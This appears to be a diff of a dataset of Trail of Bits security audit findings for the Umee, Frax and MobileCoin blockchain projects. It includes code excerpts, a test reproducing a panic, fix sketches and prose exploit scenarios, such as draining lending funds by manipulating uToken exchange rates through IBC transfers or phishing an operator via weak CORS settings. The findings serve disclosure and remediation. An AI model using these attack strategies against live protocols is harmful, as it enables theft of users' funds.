Recommendations Short term, identify, document, and test all invariants that are important for the system's security, and identify and document the arbitrage opportunities created by the system. Enable simulation of the x/oracle and x/leverage modules and ensure that the following assertions and invariants are checked during simulation runs: 1. In the UpdateExchangeRates function , the token supply value corresponds to the uToken supply value. Implement the following check: if uTokenSupply != 0 { assert(tokenSupply != 0) } (see the executable sketch after this finding). 2. In the LiquidateBorrow function (after the line if !repayment.Amount.IsPositive() ) , the following comparisons evaluate to true: ExchangeUToken(reward) == EquivalentTokenValue(repayment, baseRewardDenom) TokenValue(ExchangeUToken(ctx, reward)) == TokenValue(repayment) borrowed.AmountOf(repayment.Denom) >= repayment.Amount collateral.AmountOf(rewardDenom) >= reward.Amount module's collateral amount >= reward.Amount repayment <= desiredRepayment 3. The x/leverage module is never significantly undercollateralized at the end of a transaction. Implement a check, total collateral value * X >= total borrows value , in which X is close to 1. (It may make sense for the value of X to be greater than or equal to 1 to account for module reserves.) It may be acceptable for the module to be slightly undercollateralized, as it may mean that some liquidations have yet to be executed. 4. The amount of reserves remains above a certain minimum value, or new loans cannot be issued if the amount of reserves drops below a certain value. 5. The interest on a loan is less than or equal to the borrowing fee. (This invariant is related to the issue described in TOB-UMEE-23 .) 6. It is impossible to borrow funds without paying a fee. Currently, when four messages (lend, borrow, repay, and withdraw messages) are sent in one transaction, the EndBlocker method will not collect borrowing fees. 7. Token/uToken exchange rates are always greater than or equal to 1 and are less than an expected maximum. To avoid rapid significant price increases and decreases, ensure that the rates do not change more quickly than expected. 8. The exchangeRate value cannot be changed by public (user-callable) methods like LendAsset and WithdrawAsset . Pay special attention to rounding errors and make sure that the module is the beneficiary of all rounding operations. 9. It is impossible to liquidate more than the closeFactor in a single liquidation transaction for a defaulted loan; be mindful of the fact that a single transaction can include more than one message. Long term, extend the simulation module to cover all operations that may occur in a real Umee deployment, along with all potential error states, and run it many times before each release. Ensure the following: All modules and operations are included in the simulation module. The simulation uses a small number of accounts (e.g., between 5 and 20) to increase the likelihood of an interesting state change. The simulation uses the currencies/tokens that will be used in the production network. Oracle price changes are properly simulated. (In addition to a mode in which prices are changed randomly, implement a mode in which prices are changed only slightly, a mode in which prices are highly volatile, and a mode in which prices decrease or increase continuously for a long time period.) The simulation continues running when a transaction triggers an error. All transaction code paths are executed. (Enable code coverage to see how often individual lines are executed.)", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Undetermined" + "Severity: Medium", + "Difficulty: High" ] }, {
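A sketch of invariant 1 from the list above as a Cosmos SDK invariant (RegisterInvariants wiring omitted; the ModuleTokenBalance helper is hypothetical, and "uumee" is just an example denom):

// UTokenSupplyInvariant checks that a nonzero uToken supply is always
// backed by a nonzero token balance held by the module.
func UTokenSupplyInvariant(k Keeper) sdk.Invariant {
    return func(ctx sdk.Context) (string, bool) {
        uTokenSupply := k.TotalUTokenSupply(ctx, "u/uumee").Amount
        tokenSupply := k.ModuleTokenBalance(ctx, "uumee").Amount // hypothetical helper
        // if any uTokens exist, the module must hold backing tokens
        broken := !uTokenSupply.IsZero() && tokenSupply.IsZero()
        return sdk.FormatInvariant(types.ModuleName, "utoken-supply",
            "uToken supply is nonzero but the backing token supply is zero"), broken
    }
}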
- "title": "25. Setting collateral values manually is error-prone ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", - "body": "During the audit, the Frax Solidity team indicated that collateral located on non-mainnet chains is included in FRAX.globalCollateralValue in FRAXStablecoin , the Ethereum mainnet contract . (As indicated in TOB-FRSOL-023 , this collateral cannot currently be redeemed by users.) Using a script, the team aggregates collateral prices from across multiple chains and contracts and then posts that data to ManualTokenTrackerAMO by calling setDollarBalances . Since we did not have the opportunity to review the script and these contracts were out of scope, we cannot speak to the security of this area of the system. Other issues with collateral accounting and pricing indicate that this process needs review. Furthermore, considering the following issues, this privileged role and architecture significantly increases the attack surface of the protocol and the likelihood of a hazard: The correctness of the script used to calculate the data has not been reviewed, and users cannot audit or verify this data for themselves. The configuration of the Frax Protocol is highly complex, and we are not aware of how these interactions are tracked. It is possible that collateral can be mistakenly counted more than once or not at all. The reliability of the script and the frequency with which it is run is unknown. In times of market volatility, it is not clear whether the script will function as anticipated and be able to post updates to the mainnet. This role is not explained in the documentation or contracts, and it is not clear what guarantees users have regarding the collateralization of FRAX (i.e., what is included and updated). As of December 20, 2021, collatDollarBalance has not been updated since November 13, 2021 , and is equivalent to fraxDollarBalanceStored . This indicates that FRAX.globalCollateralValue is both out of date and incorrectly counts FRAX as collateral (see TOB-FRSOL-024 ). Recommendations Short term, include only collateral that can be valued natively on the Ethereum mainnet and do not include collateral that cannot be redeemed in FRAX.globalCollateralValue . Long term, document and follow rigorous processes that limit risk and provide confidence to users. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category", + "title": "15. Attempts to overdraw collateral cause WithdrawAsset to panic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The WithdrawAsset function panics when an account attempts to withdraw more collateral than the account holds. While panics triggered during transaction runs are recovered by the Cosmos SDK , they should be used only to handle unexpected events that should not occur in normal blockchain operations. The function should instead check the collateralToWithdraw value and return an error if it is too large. The panic occurs in the Dec.Sub method when the calculation it performs results in an overflow (figure 15.1). func (k Keeper) WithdrawAsset( /* (...) */ ) error { // (...)
if amountFromCollateral.IsPositive() { if k.GetCollateralSetting(ctx, lenderAddr, uToken.Denom) { // (...) // Calculate what borrow limit will be AFTER this withdrawal collateral := k.GetBorrowerCollateral(ctx, lenderAddr) collateralToWithdraw := sdk.NewCoins(sdk.NewCoin(uToken.Denom, amountFromCollateral)) newBorrowLimit, err := k.CalculateBorrowLimit(ctx, collateral.Sub(collateralToWithdraw) ) Figure 15.1: umee/x/leverage/keeper/keeper.go#L124-L159 To reproduce this issue, use the test shown in figure 15.2. Exploit Scenario A user of the Umee system who has enabled the collateral setting lends 1,000 UMEE tokens. The user later tries to withdraw 1,001 UMEE tokens. Due to the lack of validation of the collateralToWithdraw value, the transaction causes a panic. However, the panic is recovered, and the transaction finishes with a panic error . Because the system does not provide a proper error message, the user is confused about why the transaction failed. Recommendations Short term, when a user attempts to withdraw collateral, have the WithdrawAsset function check whether the collateralToWithdraw value is less than or equal to the collateral balance of the user's account and return an error if it is not. This will prevent the function from panicking if the withdrawal amount is too large. Long term, integrate the test shown in figure 15.2 into the codebase and extend it with additional assertions to verify other program states. func (s *IntegrationTestSuite) TestWithdrawAsset_InsufficientCollateral() { app, ctx := s.app, s.ctx lenderAddr := sdk.AccAddress([] byte ( \"addr________________\" )) lenderAcc := app.AccountKeeper.NewAccountWithAddress(ctx, lenderAddr) app.AccountKeeper.SetAccount(ctx, lenderAcc) // mint and send coins s.Require().NoError(app.BankKeeper.MintCoins(ctx, minttypes.ModuleName, initCoins)) s.Require().NoError(app.BankKeeper.SendCoinsFromModuleToAccount(ctx, minttypes.ModuleName, lenderAddr, initCoins)) // mint additional coins for just the leverage module; this way it will have available reserve // to meet conditions in the withdrawal logic s.Require().NoError(app.BankKeeper.MintCoins(ctx, types.ModuleName, initCoins)) // set collateral setting for the account uTokenDenom := types.UTokenFromTokenDenom(umeeapp.BondDenom) err := s.app.LeverageKeeper.SetCollateralSetting(ctx, lenderAddr, uTokenDenom, true ) s.Require().NoError(err) // lend asset err = s.app.LeverageKeeper.LendAsset(ctx, lenderAddr, sdk.NewInt64Coin(umeeapp.BondDenom, 1000000000 )) // 1k umee s.Require().NoError(err) // verify collateral amount and total supply of minted uTokens collateral := s.app.LeverageKeeper.GetCollateralAmount(ctx, lenderAddr, uTokenDenom) expected := sdk.NewInt64Coin(uTokenDenom, 1000000000 ) // 1k u/umee s.Require().Equal(collateral, expected) supply := s.app.LeverageKeeper.TotalUTokenSupply(ctx, uTokenDenom) s.Require().Equal(expected, supply) // withdraw more collateral than having - this panics currently uToken := collateral.Add(sdk.NewInt64Coin(uTokenDenom, 1 )) err = s.app.LeverageKeeper.WithdrawAsset(ctx, lenderAddr, uToken) s.Require().EqualError(err, \"TODO/FIXME: set proper error string here after fixing panic error\" ) // TODO/FIXME: add asserts to verify all other program state } Figure 15.2: A test that can be used to reproduce this issue", "labels": [ "Trail of Bits", "Severity: Low", "Difficulty: Low" ] }, { + "title": "16. Division by zero causes the LiquidateBorrow function to panic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "Two operations in the x/leverage module's LiquidateBorrow method may involve division by zero and lead to a panic. The first operation is shown in figure 16.1. If both repayValue and maxRepayValue are zero, the GTE (greater-than-or-equal-to) comparison will succeed, and the Quo method will panic. The repayValue variable will be set to zero if liquidatorBalance is set to zero; maxRepayValue will be set to zero if either closeFactor or borrowValue is set to zero. if repayValue.GTE(maxRepayValue) { // repayment *= (maxRepayValue / repayValue) repayment.Amount = repayment.Amount.ToDec().Mul(maxRepayValue) .Quo(repayValue) .TruncateInt() repayValue = maxRepayValue } Figure 16.1: A potential instance of division by zero ( umee/x/leverage/keeper/keeper.go#452-456 ) The second operation is shown in figure 16.2. If both reward.Amount and collateral.AmountOf(rewardDenom) are set to zero, the GTE comparison will succeed, and the Quo method will panic. The collateral.AmountOf(rewardDenom) variable can easily be set to zero, as the user may not have any collateral in the denomination indicated by the variable; reward.Amount will be set to zero if liquidatorBalance is set to zero. // reward amount cannot exceed available collateral if reward.Amount.GTE(collateral.AmountOf(rewardDenom)) { // reduce repayment.Amount to the maximum value permitted by the available collateral reward repayment.Amount = repayment.Amount.Mul(collateral.AmountOf(rewardDenom)) .Quo(reward.Amount) // use all collateral of reward denom reward.Amount = collateral.AmountOf(rewardDenom) } Figure 16.2: A potential instance of division by zero ( umee/x/leverage/keeper/keeper.go#474-480 ) Exploit Scenario A user tries to liquidate a loan. For reasons that are unclear to the user, the transaction fails with a panic. Because the error message is not specific, the user has difficulty debugging the error. Recommendations Short term, replace the GTE comparison with a strict inequality GT (greater-than) comparison. Long term, carefully validate variables in the LiquidateBorrow method to ensure that every variable stays within the expected range during the entire computation . Write negative tests with edge-case values to ensure that the methods handle errors gracefully.", "labels": [ "Trail of Bits", "Severity: Low", "Difficulty: Low" ] }, {
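A sketch of finding 16's short-term fix applied to figure 16.1 (the same change applies to figure 16.2 with reward.Amount): with a strict GT comparison, the Quo branch is never entered when repayValue is zero, and the equal case is a no-op scaling anyway.

if repayValue.GT(maxRepayValue) {
    // repayment *= (maxRepayValue / repayValue)
    repayment.Amount = repayment.Amount.ToDec().
        Mul(maxRepayValue).
        Quo(repayValue). // repayValue > maxRepayValue >= 0, so nonzero here
        TruncateInt()
}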
- "title": "1. Project contains vulnerable dependencies ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-mobilecoin-securityreview.pdf", - "body": "Running cargo-audit over the codebase revealed that the system under audit uses crates with Rust Security (RustSec) advisories and crates that are no longer maintained. RustSec ID", "labels": [ "Trail of Bits", "Severity: Low", "Difficulty: High" ] }, { - "title": "2. MobileCoin Foundation could infer token IDs in certain scenarios ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-mobilecoin-securityreview.pdf", - "body": "The MobileCoin Foundation is the recipient of all transaction fees and, in certain scenarios, could infer the token ID used in one of multiple transactions included in a block. MCIP-0025 introduced the concept of confidential token IDs. The rationale behind the proposal is to allow the MobileCoin network to support tokens other than MOB (MobileCoin's native token) in the future.
Doing so requires not only that these tokens be unequivocally identifiable but also that transactions involving any token, MOB or otherwise, have the same confidentiality properties. Before the introduction of the confidential tokens feature, all transaction fees were aggregated by the enclave, which created a single transaction fee output per block; however, the same approach applied to a system that supports transfers of tokens other than MOB could introduce information leakage risks. For example, if two users submit two transactions with the same token ID, there would be a single transaction fee output, and therefore, both users would know that they transacted with the same token. To prevent such a leak of information, MCIP-0025 proposes the following: The number of transaction fee outputs on a block should always equal the minimum value between the number of token IDs and the number of transactions in that block (e.g., num_tx_fee_out = min(num_token_ids, num_transactions)). This essentially means that a block with a single transaction will still have a single transaction fee output, but a block with multiple transactions with the same token ID will have multiple transaction fee outputs, one with the aggregated fee and the others with a zero-value fee. Finally, it is worth mentioning that transaction fees are not paid in MOB but in the token that is being transacted; this creates a better user experience, as users do not need to own MOB to send tokens to other people. While this proposal does indeed preserve the confidentiality requirement, it falls short in one respect: the receiver of all transaction fees in the MobileCoin network is the MobileCoin Foundation, meaning that it will always know the token ID corresponding to a transaction fee output. Therefore, if only a single token is used in a block, the foundation will know the token ID used by all of the transactions in that block. Exploit Scenario Alice and Bob use the MobileCoin network to make payments between them. They send each other multiple payments, using the same token, and their transactions are included in a single block. Eve, who has access to the MobileCoin Foundation's viewing key, is able to decrypt the transaction fee outputs corresponding to that block and, because no other token was used inside the block, is able to infer the token that Alice and Bob used to make the payments. Recommendations Short term, document the fact that transaction token IDs are visible to the MobileCoin Foundation. Transparency on this issue will help users understand the information that is visible by some parties. Additionally, consider implementing the following alternative designs: Require that all transaction fees be paid in MOB. This solution would result in a degraded user experience compared to the current design; however, it would address the issue at hand. Aggregate fee outputs across multiple blocks. This solution would achieve only probabilistic confidentiality of information because if all those blocks transact in the same token, the foundation would still be able to infer the ID. Long term, document the trade-offs between allowing users to pay fees in the tokens they transact with and restricting fee payments to only MOB, and document how these trade-offs could affect the confidentiality of the system.", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: High" ] }, {
+ "title": "17. Architecture-dependent code ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "In the Go programming language, the bit size of an int variable depends on the platform on which the code is executed. On a 32-bit platform, it will be 32 bits, and on a 64-bit platform, 64 bits. Validators running on different architectures will therefore interpret int types differently, which may lead to transaction-parsing discrepancies and ultimately to a consensus failure or chain split. One use of the int type is shown in figure 17.1. Because casting the maxValidators variable to the int type should not cause it to exceed the maximum int value for a 32-bit platform, we set the severity of this finding to informational. for ; iterator.Valid() && i < int (maxValidators) ; iterator.Next() { Figure 17.1: An architecture-dependent loop condition in the EndBlocker method ( umee/x/oracle/abci.go#34 ) Exploit Scenario The maxValidators variable (a variable of the uint32 type) is set to its maximum value, 4,294,967,295. During the execution of the x/oracle module's EndBlocker method, some validators cast the variable to a negative number, while others cast it to a large positive integer. The chain then stops working because the validators cannot reach a consensus. Recommendations Short term, ensure that architecture-dependent types are not used in the codebase . Long term, test the system with parameters set to various edge-case values, including the maximum and minimum values of different integer types. Test the system on all common architectures (e.g., architectures with 32- and 64-bit CPUs), or develop documentation specifying the architecture(s) used in testing.", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: High" ] }, {
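A sketch of a fix for finding 17, mirroring the loop in figure 17.1: keeping the counter at a fixed 32-bit width (instead of casting maxValidators to the platform-sized int) makes the comparison behave identically on 32- and 64-bit validators.

// fixed-width counter instead of the platform-sized int
var i uint32
for ; iterator.Valid() && i < maxValidators; iterator.Next() {
    // (...) original loop body, incrementing i where the original did
    i++
}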
Long term, continue to investigate solutions to the security problems surrounding the confidential tokens feature. A solution that does not reveal token IDs to the enclave could exist.", + "title": "18. Weak cross-origin resource sharing settings ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "In the price-feeder's cross-origin resource sharing (CORS) settings, most of the same-origin policy protections are disabled. This increases the severity of vulnerabilities like cross-site request forgery. v1Router.Methods( \"OPTIONS\" ).HandlerFunc( func (w http.ResponseWriter, r *http.Request) { w.Header().Set( \"Access-Control-Allow-Origin\" , r.Header.Get( \"Origin\" )) w.Header().Set( \"Access-Control-Allow-Methods\" , \"GET, PUT, POST, DELETE, OPTIONS\" ) w.Header().Set( \"Access-Control-Allow-Headers\" , \"Content-Type, Access-Control-Allow-Headers, Authorization, X-Requested-With\" ) w.Header().Set( \"Access-Control-Allow-Credentials\" , \"true\" ) w.WriteHeader(http.StatusOK) }) Figure 18.1: The current CORS configuration ( umee/price-feeder/router/v1/router.go#46-52 ) We set the severity of this finding to informational because no sensitive endpoints are exposed by the price-feeder router. Exploit Scenario A new endpoint is added to the price-feeder API. It accepts PUT requests that can update the tool's provider list. An attacker uses phishing to lure the price-feeder's operator to a malicious website. The website triggers an HTTP PUT request to the API, changing the provider list to a list in which all addresses are controlled by the attacker. The attacker then repeats the attack against most of the validators, manipulates on-chain prices, and drains the system's funds. Recommendations Short term, use strong default values in the CORS settings. Long term, ensure that APIs exposed by the price-feeder have proper protections against web vulnerabilities.", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: High" ] }, { - "title": "4. Nonces are not stored per token ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-mobilecoin-securityreview.pdf", - "body": "Mint and mint configuration transaction nonces are not distinguished by the tokens with which they are associated. Malicious minters or governors could use this fact to conduct denial-of-service attacks against other minters and governors. The relevant code appears in figures 4.1 and 4.2. For each type of transaction, nonces are inserted into a seen_nonces set without regard to the token indicated in the transaction. let mut seen_nonces = BTreeSet::default(); let mut validated_txs = Vec::with_capacity(mint_config_txs.len()); for tx in mint_config_txs { // Ensure all nonces are unique. if !seen_nonces.insert(tx.prefix.nonce.clone()) { return Err(Error::FormBlock(format!( \"Duplicate MintConfigTx nonce: {:?}\", tx.prefix.nonce ))); } Figure 4.1: consensus/enclave/impl/src/lib.rs#L342-L352 let mut mint_txs = Vec::with_capacity(mint_txs_with_config.len()); let mut seen_nonces = BTreeSet::default(); for (mint_tx, mint_config_tx, mint_config) in mint_txs_with_config { // The nonce should be unique. if !seen_nonces.insert(mint_tx.prefix.nonce.clone()) { return Err(Error::FormBlock(format!( \"Duplicate MintTx nonce: {:?}\", mint_tx.prefix.nonce ))); } Figure 4.2: consensus/enclave/impl/src/lib.rs#L384-L393 Note that the described attack could be made worse by how nonces are intended to be used.
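As a concrete illustration of the short-term fix for finding 18, here is a minimal Go sketch (not the price-feeder's actual router code): the preflight handler grants CORS headers only to origins on an explicit, operator-configured allowlist, and only for the methods the API actually needs. The allowedOrigins map and the example origin are hypothetical.

```go
package main

import "net/http"

// allowedOrigins is an assumed operator-configured allowlist, not a real
// price-feeder setting.
var allowedOrigins = map[string]bool{
	"https://dashboard.example.com": true,
}

func corsHandler(w http.ResponseWriter, r *http.Request) {
	origin := r.Header.Get("Origin")
	if !allowedOrigins[origin] {
		w.WriteHeader(http.StatusForbidden) // unknown origins get no CORS grants
		return
	}
	w.Header().Set("Access-Control-Allow-Origin", origin) // echo only vetted origins
	w.Header().Set("Access-Control-Allow-Methods", "GET, OPTIONS")
	w.Header().Set("Vary", "Origin") // keep caches from reusing the grant across origins
	w.WriteHeader(http.StatusOK)
}

func main() {
	http.HandleFunc("/", corsHandler)
	_ = http.ListenAndServe("127.0.0.1:7171", nil)
}
```

Reflecting the request's Origin header unconditionally, as in figure 18.1, is equivalent to disabling the same-origin policy; an allowlist restores it.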
The following passage from the white paper suggests that nonces are generated deterministically from public data. Generating nonces in this way could make them easy for an attacker to predict. When submitting a MintTx, we include a nonce to protect against replay attacks, and a tombstone block to prevent the transaction from being nominated indefinitely, and these are committed to the chain. (For example, in a bridge application, this nonce may be derived from records on the source chain, to ensure that each deposit on the source chain leads to at most one mint.) Exploit Scenario Mallory (a minter) learns that Alice (another minter) intends to submit a mint transaction with a particular nonce. Mallory submits a mint transaction with that nonce first, making Alice's invalid. Recommendations Short term, store nonces per token, instead of all together. Doing so will prevent the denial-of-service attack described above. Long term, when adding new data to blocks or to the blockchain configuration, carefully consider whether it should be stored per token. Doing so could help to prevent denial-of-service attacks.", + "title": "19. price-feeder is at risk of rate limiting by public APIs ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "Price providers used by the price-feeder tool may enforce limits on the number of requests they serve. After reaching a limit, the tool should take certain actions to avoid a prolonged or even permanent ban. Moreover, using API keys or non-HTTP access channels would decrease the price-feeder's chance of being rate limited. Every API has its own rules, which should be reviewed and respected. The rules of three APIs are summarized below. Binance has hard, machine-learning, and web application firewall limits. Users are required to stop sending requests if they receive a 429 HTTP response code. Kraken implements rate limiting based on call counters and recommends using the WebSockets API instead of the REST API. Huobi restricts the number of requests to 10 per second and recommends using an API key. Exploit Scenario A price-feeder exceeds the limits of the Binance API. It is rate limited and receives a 429 HTTP response code from the API. The tool does not notice the response code and continues to spam the API. As a result, it receives a permanent ban. The validator using the price-feeder then starts reporting imprecise exchange rates and gets slashed. Recommendations Short term, review the requirements and recommendations of all APIs supported by the system. Enforce their requirements in a user-friendly manner; for example, allow users to set and rotate API keys, delay HTTP requests so that the price-feeder will avoid rate limiting but still report accurate prices, and log informative error messages upon reaching rate limits. Long term, perform stress-testing to ensure that the implemented safety checks work properly and are robust.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Medium", "Difficulty: Medium" ] }, { - "title": "5. Clients have no option for verifying blockchain configuration ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-mobilecoin-securityreview.pdf", - "body": "Clients have no way to verify whether the MobileCoin node they connect to is using the correct blockchain configuration.
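For finding 19, a minimal Go sketch of the recommended client behavior, assuming a hypothetical provider URL: stop and back off when an exchange API answers 429, honoring the Retry-After header when present, instead of continuing to spam the API.

```go
package main

import (
	"fmt"
	"net/http"
	"strconv"
	"time"
)

// fetchWithBackoff retries a GET request with exponential backoff whenever the
// server responds with 429 Too Many Requests.
func fetchWithBackoff(url string, maxAttempts int) (*http.Response, error) {
	delay := time.Second
	for attempt := 0; attempt < maxAttempts; attempt++ {
		resp, err := http.Get(url)
		if err != nil {
			return nil, err
		}
		if resp.StatusCode != http.StatusTooManyRequests {
			return resp, nil
		}
		resp.Body.Close()
		// Respect the server's Retry-After header if it is set (in seconds).
		if s := resp.Header.Get("Retry-After"); s != "" {
			if secs, err := strconv.Atoi(s); err == nil {
				delay = time.Duration(secs) * time.Second
			}
		}
		fmt.Printf("rate limited; waiting %v before retrying\n", delay)
		time.Sleep(delay)
		delay *= 2 // exponential backoff between attempts
	}
	return nil, fmt.Errorf("still rate limited after %d attempts", maxAttempts)
}

func main() {
	if resp, err := fetchWithBackoff("https://api.example.com/ticker", 5); err == nil {
		resp.Body.Close()
	}
}
```

A production implementation would also log the rate-limit event and, as the finding recommends, prefer WebSockets or keyed API access where the provider supports them.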
This exposes users to attacks, as detailed in the white paper: Similarly to how the nodes ensure that they are similarly configured during attestation, (by mixing a hash of their configuration into the responder id used during attestation), the peer-to-node attestation channels could also do this, so that users can fail to attest immediately if malicious manipulation of configuration has occurred. The problem with this approach is that the users have no particularly good source of truth around the correct runtime configuration of the services. The problem that users have no particularly good source of truth could be solved by publishing the latest blockchain configuration via a separate channel (e.g., a publicly accessible server). Furthermore, allowing users to opt in to such additional checks would provide additional security to users who desire it. Exploit Scenario Alice falls victim to the attack described in the white paper. The attack would have been thwarted had Alice known that the node she connected to was not using the correct blockchain configuration. Recommendations Short term, make the current blockchain configuration publicly available, and allow nodes to attest to clients using their configuration. Doing so will help security-conscious users to better protect themselves. Long term, avoid withholding data from clients during attestation. Adopt a general principle that if data should be included in node-to-node attestation, then it should be included in node-to-client attestation as well. Doing so will help to ensure the security of users.", + "title": "20. Lack of prioritization of oracle messages ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "Oracle messages are not prioritized over other transactions for inclusion in a block. If the network is highly congested, the messages may not be included in a block. Although the Umee system could increase the fee charged for including an oracle message in a block, that solution is suboptimal and may not work. Tactics for prioritizing important transactions include the following: Using the custom CheckTx implementation introduced in Tendermint version 0.35, which returns a priority argument Reimplementing part of the Tendermint engine, as Terra Money did Using Substrate's dispatch classes, which allow developers to mark transactions as normal, operational, or mandatory Exploit Scenario The Umee network is congested. Validators send their exchange rate votes, but the exchange rates are not included in a block. An attacker then exploits the situation by draining the network of its tokens. Recommendations Short term, use a custom CheckTx method to prioritize oracle messages. This will help prevent validators' votes from being left out of a block and ignored by an oracle. Long term, ensure that operations that affect the whole system cannot be front-run or delayed by attackers or blocked by network congestion.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Medium", + "Difficulty: Medium" ] }, { - "title": "6. Confidential tokens cannot support frequent price swings ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-mobilecoin-securityreview.pdf", - "body": "The method for determining tokens' minimum fees has limited applicability. In particular, it cannot support tokens whose prices change frequently.
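For finding 20's short-term recommendation, here is a minimal Go sketch assuming Tendermint v0.35's ABCI types, where ResponseCheckTx carries a mempool priority. The App type and the isOracleVote classifier are hypothetical stand-ins for the application's own logic, not Umee code.

```go
package app

import abci "github.com/tendermint/tendermint/abci/types"

// isOracleVote is a hypothetical classifier; a real implementation would
// decode the transaction and look for the oracle module's vote and prevote
// message types.
func isOracleVote(tx []byte) bool {
	return len(tx) > 0 && tx[0] == 0x01 // placeholder heuristic for the sketch
}

type App struct{}

// CheckTx validates a transaction and, per the finding's recommendation,
// returns a higher priority for oracle votes so the mempool orders them ahead
// of ordinary transactions when building a block.
func (App) CheckTx(req abci.RequestCheckTx) abci.ResponseCheckTx {
	res := abci.ResponseCheckTx{Code: abci.CodeTypeOK}
	if isOracleVote(req.Tx) {
		res.Priority = 1_000_000
	}
	return res
}
```

The same pattern applies to any message class the chain considers critical; the priority value itself only needs to dominate the fees-derived priorities of ordinary traffic.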
Thus, if a token's price increases relative to the price of MOB, the token's minimum fee should decrease. Similarly, if a token's price decreases relative to the price of MOB, the token's minimum fee should increase. However, an enclave sets its fee map from the blockchain configuration during initialization (figure 6.1) and does not change the fee map thereafter. Thus, the enclave would seem to have to be restarted if its blockchain configuration and fee map were to change. This fact implies that the current setup cannot support tokens whose prices shift frequently. fn enclave_init( &self, peer_self_id: &ResponderId, client_self_id: &ResponderId, sealed_key: &Option, blockchain_config: BlockchainConfig, ) -> Result<(SealedBlockSigningKey, Vec)> { // Check that fee map is actually well formed FeeMap::is_valid_map(blockchain_config.fee_map.as_ref()).map_err(Error::FeeMap)?; // Validate governors signature. if !blockchain_config.governors_map.is_empty() { let signature = blockchain_config .governors_signature .ok_or(Error::MissingGovernorsSignature)?; let minting_trust_root_public_key = Ed25519Public::try_from(&MINTING_TRUST_ROOT_PUBLIC_KEY[..]) .map_err(Error::ParseMintingTrustRootPublicKey)?; minting_trust_root_public_key .verify_governors_map(&blockchain_config.governors_map, &signature) .map_err(|_| Error::InvalidGovernorsSignature)?; } self.ct_min_fee_map .set(Box::new( blockchain_config.fee_map.as_ref().iter().collect(), )) .expect(\"enclave was already initialized\"); Figure 6.1: consensus/enclave/impl/src/lib.rs#L454-L483 Exploit Scenario MobileCoin integrates token T. The value of T decreases, but the minimum fee remains the same. Users pay the minimum fee, resulting in lost income to the MobileCoin Foundation. Recommendations Short term, accept only tokens with a history of price stability. Doing so will ensure that the new features are used only with tokens that can be supported. Long term, consider including two inputs in each transaction, one for the token transferred and one to pay the fee in MOB, as suggested in TOB-MCCT-2.", + "title": "21. Risk of token/uToken exchange rate manipulation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", + "body": "The Umee specification states that the token/uToken exchange rate can be affected only by the accrual of interest (not by Lend, Withdraw, Borrow, Repay, or Liquidate transactions). However, this invariant can be broken: When tokens are burned or minted through an Inter-Blockchain Communication (IBC) transfer, the ibc-go library accesses the x/bank module's keeper interface, which changes the total token supply (as shown in figure 21.2). This behavior is mentioned in a comment shown in figure 21.1. Sending tokens directly to the module through an x/bank message also affects the exchange rate. func (k Keeper) TotalUTokenSupply(ctx sdk.Context, uTokenDenom string ) sdk.Coin { if k.IsAcceptedUToken(ctx, uTokenDenom) { return k.bankKeeper.GetSupply(ctx, uTokenDenom) // TODO - Question: Does bank module still track balances sent (locked) via IBC? // If it doesn't then the balance returned here would decrease when the tokens // are sent off, which is not what we want. In that case, the keeper should keep // an sdk.Int total supply for each uToken type.
} return sdk.NewCoin(uTokenDenom, sdk.ZeroInt()) } Figure 21.1: The method vulnerable to unexpected IBC transfers ( umee/x/leverage/keeper/keeper.go#65-73 ) if err := k.bankKeeper.BurnCoins( ctx, types.ModuleName, sdk.NewCoins(token), Figure 21.2: The IBC library code that accesses the x/bank module's keeper interface ( ibc-go/modules/apps/transfer/keeper/relay.go#136-137 ) Exploit Scenario An attacker with two Umee accounts lends tokens through the system and receives a commensurate number of uTokens. He temporarily sends the uTokens from one of the accounts to another chain (chain B), decreasing the total supply and increasing the token/uToken exchange rate. The attacker uses the second account to withdraw more tokens than he otherwise could and then sends uTokens back from chain B to the first account. In this way, he drains funds from the module. Recommendations Short term, ensure that the TotalUTokenSupply method accounts for IBC transfers. Use the Cosmos SDK's blocklisting feature to disable direct transfers to the leverage and oracle modules. Consider setting DefaultSendEnabled to false and explicitly enabling certain tokens' transfer capabilities. Long term, follow GitHub issues #10386 and #5931, which concern functionalities that may enable module developers to make token accounting more reliable. Additionally, ensure that the system accounts for inflation.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: High", + "Difficulty: Medium" ] }, { - "title": "7. Overflow handling could allow recovery of transaction token ID ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-mobilecoin-securityreview.pdf", - "body": "The system's fee calculation could overflow a u64 value. When this occurs, the fee is divided up into multiple smaller fees, each fitting into a u64 value. Under certain conditions, this behavior could be abused to reveal whether a token ID is used in a block. The relevant code appears in figure 7.1. The hypothetical attack is described in the exploit scenario below. loop { let output_fee = min(total_fee, u64::MAX as u128) as u64; outputs.push(mint_output( config.block_version, &fee_recipient, FEES_OUTPUT_PRIVATE_KEY_DOMAIN_TAG.as_bytes(), parent_block, &transactions, Amount { value: output_fee, token_id, }, outputs.len(), )); total_fee -= output_fee as u128; if total_fee == 0 { break; } } Figure 7.1: consensus/enclave/impl/src/lib.rs#L855-L873 Exploit Scenario Mallory is a (malicious) minter of token T. 